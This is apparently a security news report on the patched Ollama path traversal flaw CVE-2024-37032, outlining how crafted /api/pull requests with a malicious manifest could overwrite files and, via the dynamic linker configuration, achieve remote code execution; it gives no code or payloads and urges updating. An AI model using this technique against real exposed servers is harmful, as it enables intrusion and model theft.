Recent research discovered the now-patched security flaw in the Ollama open-source artificial intelligence (AI) infrastructure platform. Based on reports, threat actors can exploit the vulnerability and use it for remote code execution.
The researchers called the CVE-2024-37032 bug “Probllama” and immediately disclosed it last month upon discovering it. Moreover, the admin of the affected platform has already resolved the issue in its version, released on May 7, 2024.
The impacted AI platform is a service that allows a user to package, deploy, and run large language models (LLMs) locally on multiple operating systems, including Windows, Linux, and macOS.
The Ollama bug is an insecure input validation issue.
According to investigations, the recently discovered Ollama critical vulnerability is a case of poor input validation. This results in a path traversal exploit that an unauthorised individual may use to overwrite arbitrary files on the server, which could result in remote code execution.
To successfully exploit the vulnerability, the threat actor must generate specially crafted HTTP queries to the Ollama API server.
It specifically uses the API endpoint “/api/pull”, which is utilised to acquire a model from the official registry or a private repository, to provide a malicious model manifest file with a path traversal payload in the infrastructure.
Additionally, this vulnerability could be exploited to corrupt arbitrary files on the system and gain remote code execution by overwriting a configuration file associated with the dynamic linker with a rogue shared library and launching it every time a program is executed.
Ollama’s fundamental lack of authentication further complicates the situation since it allows an attacker to use a publicly accessible server to steal or modify AI models and compromise self-hosted AI inference servers.
This information also leverages middleware, such as authentication-enabled reverse proxies. The researchers claimed they discovered over 1,000 Ollama vulnerable instances hosting various AI models that lacked security.
They also explained that Probllama is an easy-to-abuse RCE that affects modern AI infrastructure. Despite the codebase being relatively new and coded in modern programming languages, classic vulnerabilities such as path traversal are still an issue.
Users that utilise the platform should update their software to avoid the exploit since the bug is now publicly available, giving malicious entities an idea of how to operate an attack.